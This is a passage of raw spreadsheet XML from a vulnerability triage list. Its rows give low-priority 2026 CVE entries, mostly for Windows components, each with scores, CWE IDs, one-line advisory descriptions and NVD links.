t="inlineStr" /><c r="R1487" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1487" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t></is></c></row><row r="1488"><c r="A1488" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1488" s="5" t="inlineStr"><is><t>CVE-2026-68891</t></is></c><c r="D1488" s="5" t="n"><v>4.7</v></c><c r="E1488" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1488" s="5" t="inlineStr" /><c r="H1488" s="5" t="n"><v>0.002</v></c><c r="I1488" s="5" t="inlineStr" /><c r="J1488" s="5" t="inlineStr" /><c r="K1488" s="5" t="inlineStr" /><c r="L1488" s="5" t="inlineStr" /><c r="M1488" s="5" t="inlineStr" /><c r="N1488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1488" s="5" t="inlineStr" /><c r="R1488" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1488" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t></is></c></row><row r="1489"><c r="A1489" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1489" s="5" t="inlineStr"><is><t>CVE-2026-69316</t></is></c><c r="D1489" s="5" t="n"><v>4.7</v></c><c r="E1489" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1489" s="5" t="inlineStr" /><c r="H1489" s="5" t="n"><v>0.003</v></c><c r="I1489" s="5" t="inlineStr" /><c r="J1489" s="5" t="inlineStr" /><c r="K1489" s="5" t="inlineStr" /><c r="L1489" s="5" t="inlineStr" /><c r="M1489" s="5" t="inlineStr" /><c r="N1489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1489" s="5" t="inlineStr" /><c r="R1489" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1489" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t></is></c></row><row r="1490"><c r="A1490" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1490" s="5" t="inlineStr"><is><t>CVE-2026-69425</t></is></c><c r="D1490" s="5" t="n"><v>4.7</v></c><c r="E1490" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1490" s="5" t="inlineStr" /><c r="H1490" s="5" t="n"><v>0.003</v></c><c r="I1490" s="5" t="inlineStr" /><c r="J1490" s="5" t="inlineStr" /><c r="K1490" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1490" s="5" t="inlineStr" /><c r="M1490" s="5" t="inlineStr" /><c r="N1490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1490" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1490" s="5" t="inlineStr" /><c r="R1490" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1490" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t></is></c></row><row r="1491"><c r="A1491" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1491" s="5" t="inlineStr"><is><t>CVE-2026-69483</t></is></c><c r="D1491" s="5" t="n"><v>4.7</v></c><c r="E1491" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1491" s="5" t="inlineStr" /><c r="H1491" s="5" t="n"><v>0.003</v></c><c r="I1491" s="5" t="inlineStr" /><c r="J1491" s="5" t="inlineStr" /><c r="K1491" s="5" t="inlineStr" /><c r="L1491" s="5" t="inlineStr" /><c r="M1491" s="5" t="inlineStr" /><c r="N1491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1491" s="5" t="inlineStr" /><c r="R1491" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1491" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t></is></c><c r="T1491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t></is></c></row><row r="1492"><c r="A1492" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1492" s="5" t="inlineStr"><is><t>CVE-2026-69771</t></is></c><c r="D1492" s="5" t="n"><v>4.7</v></c><c r="E1492" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1492" s="5" t="inlineStr" /><c r="H1492" s="5" t="n"><v>0.003</v></c><c r="I1492" s="5" t="inlineStr" /><c r="J1492" s="5" t="inlineStr" /><c r="K1492" s="5" t="inlineStr" /><c r="L1492" s="5" t="inlineStr" /><c r="M1492" s="5" t="inlineStr" /><c r="N1492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1492" s="5" t="inlineStr" /><c r="R1492" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1492" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t></is></c></row><row r="1493"><c r="A1493" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1493" s="5" t="inlineStr"><is><t>CVE-2026-69792</t></is></c><c r="D1493" s="5" t="n"><v>4.7</v></c><c r="E1493" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1493" s="5" t="inlineStr" /><c r="H1493" s="5" t="n"><v>0.002</v></c><c r="I1493" s="5" t="inlineStr" /><c r="J1493" s="5" t="inlineStr" /><c r="K1493" s="5" t="inlineStr" /><c r="L1493" s="5" t="inlineStr" /><c r="M1493" s="5" t="inlineStr" /><c r="N1493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1493" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1493" s="5" t="inlineStr" /><c r="R1493" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1493" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t></is></c></row><row r="1494"><c r="A1494" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1494" s="5" t="inlineStr"><is><t>CVE-2026-69832</t></is></c><c r="D1494" s="5" t="n"><v>4.7</v></c><c r="E1494" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1494" s="5" t="inlineStr" /><c r="H1494" s="5" t="n"><v>0.004</v></c><c r="I1494" s="5" t="inlineStr" /><c r="J1494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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4" s="5" t="inlineStr" /><c r="M1494" s="5" t="inlineStr" /><c r="N1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1494" s="5" t="inlineStr" /><c r="R1494" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1494" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t></is></c></row><row r="1495"><c r="A1495" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1495" s="5" t="inlineStr"><is><t>CVE-2026-69853</t></is></c><c r="D1495" s="5" t="n"><v>4.7</v></c><c r="E1495" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1495" s="5" t="inlineStr" /><c r="H1495" s="5" t="n"><v>0.003</v></c><c r="I1495" s="5" t="inlineStr" /><c r="J1495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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5" s="5" t="inlineStr" /><c r="M1495" s="5" t="inlineStr" /><c r="N1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1495" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1495" s="5" t="inlineStr" /><c r="R1495" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1495" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t></is></c></row><row r="1496"><c r="A1496" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1496" s="5" t="inlineStr"><is><t>CVE-2026-69895</t></is></c><c r="D1496" s="5" t="n"><v>4.7</v></c><c r="E1496" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1496" s="5" t="inlineStr" /><c r="H1496" s="5" t="n"><v>0.003</v></c><c r="I1496" s="5" t="inlineStr" /><c r="J1496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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6" s="5" t="inlineStr" /><c r="M1496" s="5" t="inlineStr" /><c r="N1496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1496" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1496" s="5" t="inlineStr" /><c r="R1496" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1496" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t></is></c></row><row r="1497"><c r="A1497" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1497" s="5" t="inlineStr"><is><t>CVE-2026-72931</t></is></c><c r="D1497" s="5" t="n"><v>4.7</v></c><c r="E1497" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1497" s="5" t="inlineStr" /><c r="H1497" s="5" t="n"><v>0.003</v></c><c r="I1497" s="5" t="inlineStr" /><c r="J1497" s="5" t="inlineStr" /><c r="K1497" s="5" t="inlineStr" /><c r="L1497" s="5" t="inlineStr" /><c r="M1497" s="5" t="inlineStr" /><c r="N1497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1497" s="5" t="inlineStr" /><c r="R1497" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="S1497" s="5" t="inlineStr"><is><t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t></is></c><c r="T1497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t></is></c></row><row r="1498"><c r="A1498" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1498" s="5" t="inlineStr"><is><t>CVE-2026-69381</t></is></c><c r="D1498" s="5" t="n"><v>4.6</v></c><c r="E1498" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1498" s="5" t="inlineStr" /><c r="H1498" s="5" t="n"><v>0.004</v></c><c r="I1498" s="5" t="inlineStr" /><c r="J1498" s="5" t="inlineStr" /><c r="K1498" s="5" t="inlineStr" /><c r="L1498" s="5" t="inlineStr" /><c r="M1498" s="5" t="inlineStr" /><c r="N1498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1498" s="5" t="inlineStr" /><c r="R1498" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1498" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t></is></c></row><row r="1499"><c r="A1499" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1499" s="5" t="inlineStr"><is><t>CVE-2026-69548</t></is></c><c r="D1499" s="5" t="n"><v>4.6</v></c><c r="E1499" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1499" s="5" t="inlineStr" /><c r="H1499" s="5" t="n"><v>0.005</v></c><c r="I1499" s="5" t="inlineStr" /><c r="J1499" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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9" s="5" t="inlineStr" /><c r="M1499" s="5" t="inlineStr" /><c r="N1499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1499" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1499" s="5" t="inlineStr" /><c r="R1499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t></is></c></row><row r="1500"><c r="A1500" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1500" s="5" t="inlineStr"><is><t>CVE-2026-76959</t></is></c><c r="D1500" s="5" t="n"><v>4.6</v></c><c r="E1500" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1500" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1500" s="5" t="inlineStr" /><c r="H1500" s="5" t="n"><v>0.001</v></c><c r="I1500" s="5" t="inlineStr" /><c r="J1500" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1500" s="5" t="inlineStr" /><c r="L1500" s="5" t="inlineStr" /><c r="M1500" s="5" t="inlineStr" /><c r="N1500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1500" s="5" t="inlineStr" /><c r="R1500" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1500"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00" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t></is></c></row><row r="1501"><c r="A1501" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1501" s="5" t="inlineStr"><is><t>CVE-2026-78452</t></is></c><c r="D1501" s="5" t="n"><v>4.6</v></c><c r="E1501" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1501" s="5" t="inlineStr" /><c r="H1501" s="5" t="n"><v>0.005</v></c><c r="I1501" s="5" t="inlineStr" /><c r="J1501" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K150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501" s="5" t="inlineStr" /><c r="M1501" s="5" t="inlineStr" /><c r="N1501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1501" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1501" s="5" t="inlineStr" /><c r="R1501" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1501" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t></is></c></row><row r="1502"><c r="A1502" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1502" s="5" t="inlineStr"><is><t>CVE-2026-78508</t></is></c><c r="D1502" s="5" t="n"><v>4.6</v></c><c r="E1502" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1502" s="5" t="inlineStr" /><c r="H1502" s="5" t="n"><v>0.004</v></c><c r="I1502" s="5" t="inlineStr" /><c r="J1502" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K150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02" s="5" t="inlineStr" /><c r="M1502" s="5" t="inlineStr" /><c r="N1502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1502" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1502" s="5" t="inlineStr" /><c r="R1502" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1502" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t></is></c></row><row r="1503"><c r="A1503" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1503" s="5" t="inlineStr"><is><t>CVE-2026-78971</t></is></c><c r="D1503" s="5" t="n"><v>4.6</v></c><c r="E1503" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1503" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1503" s="5" t="inlineStr" /><c r="H1503" s="5" t="n"><v>0.002</v></c><c r="I1503" s="5" t="inlineStr" /><c r="J1503" s="5" t="inlineStr" /><c r="K1503" s="5" t="inlineStr" /><c r="L1503" s="5" t="inlineStr" /><c r="M1503" s="5" t="inlineStr" /><c r="N1503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1503" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1503" s="5" t="inlineStr" /><c r="R1503" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1503" s="5" t="inlineStr"><is><t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t></is></c><c r="T1503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t></is></c></row><row r="1504"><c r="A1504" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1504" s="5" t="inlineStr"><is><t>CVE-2026-0001</t></is></c><c r="D1504" s="5" t="n"><v>4.4</v></c><c r="E1504" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1504" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1504" s="5" t="inlineStr" /><c r="H1504" s="5" t="n"><v>0.002</v></c><c r="I1504" s="5" t="inlineStr" /><c r="J1504" s="5" t="inlineStr" /><c r="K1504" s="5" t="inlineStr" /><c r="L1504" s="5" t="inlineStr" /><c r="M1504" s="5" t="inlineStr" /><c r="N1504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1504" s="5" t="inlineStr" /><c r="R1504" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1504"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504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t></is></c></row><row r="1505"><c r="A1505" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1505" s="5" t="inlineStr"><is><t>CVE-2026-69713</t></is></c><c r="D1505" s="5" t="n"><v>4.4</v></c><c r="E1505" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1505" s="5" t="inlineStr" /><c r="H1505" s="5" t="n"><v>0.003</v></c><c r="I1505" s="5" t="inlineStr" /><c r="J1505" s="5" t="inlineStr" /><c r="K1505" s="5" t="inlineStr" /><c r="L1505" s="5" t="inlineStr" /><c r="M1505" s="5" t="inlineStr" /><c r="N1505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1505" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1505" s="5" t="inlineStr" /><c r="R1505" s="5" t="inlineStr" /><c r="S1505" s="5" t="inlineStr"><is><t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t></is></c></row><row r="1506"><c r="A1506" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1506" s="5" t="inlineStr"><is><t>CVE-2026-72980</t></is></c><c r="D1506" s="5" t="n"><v>4.4</v></c><c r="E1506" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1506" s="5" t="inlineStr" /><c r="H1506" s="5" t="n"><v>0.003</v></c><c r="I1506" s="5" t="inlineStr" /><c r="J1506" s="5" t="inlineStr" /><c r="K1506" s="5" t="inlineStr" /><c r="L1506" s="5" t="inlineStr" /><c r="M1506" s="5" t="inlineStr" /><c r="N1506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1506" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1506" s="5" t="inlineStr" /><c r="R1506" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S1506" s="5" t="inlineStr"><is><t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t></is></c></row><row r="1507"><c r="A1507" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1507" s="5" t="inlineStr"><is><t>CVE-2026-28627</t></is></c><c r="D1507" s="5" t="n"><v>4.3</v></c><c r="E1507" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1507" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1507" s="5" t="inlineStr" /><c r="H1507" s="5" t="n"><v>0.002</v></c><c r="I1507" s="5" t="inlineStr" /><c r="J1507" s="5" t="inlineStr" /><c r="K1507" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1507" s="5" t="inlineStr" /><c r="M1507" s="5" t="inlineStr" /><c r="N1507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1507" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1507" s="5" t="inlineStr" /><c r="R1507" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1507" s="5" t="inlineStr"><is><t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t></is></c></row><row r="1508"><c r="A1508" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1508" s="5" t="inlineStr"><is><t>CVE-2026-45527</t></is></c><c r="D1508" s="5" t="n"><v>4.3</v></c><c r="E1508" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1508" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1508" s="5" t="inlineStr" /><c r="H1508" s="5" t="n"><v>0.003</v></c><c r="I1508" s="5" t="inlineStr" /><c r="J1508" s="5" t="inlineStr" /><c r="K1508" s="5" t="inlineStr" /><c r="L1508" s="5" t="inlineStr" /><c r="M1508" s="5" t="inlineStr" /><c r="N1508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1508" s="5" t="inlineStr" /><c r="R1508" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1508" s="5" t="inlineStr"><is><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is></c><c r="T1508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t></is></c></row><row r="1509"><c r="A1509" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1509" s="5" t="inlineStr"><is><t>CVE-2026-53638</t></is></c><c r="D1509" s="5" t="n"><v>4.3</v></c><c r="E1509" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1509" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1509" s="5" t="inlineStr" /><c r="H1509" s="5" t="n"><v>0.002</v></c><c r="I1509" s="5" t="inlineStr" /><c r="J1509" s="5" t="inlineStr" /><c r="K1509" s="5" t="inlineStr" /><c r="L1509" s="5" t="inlineStr" /><c r="M1509" s="5" t="inlineStr" /><c r="N1509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1509" s="5" t="inlineStr" /><c r="R1509" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1509" s="5" t="inlineStr"><is><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is></c><c r="T1509" s="6" 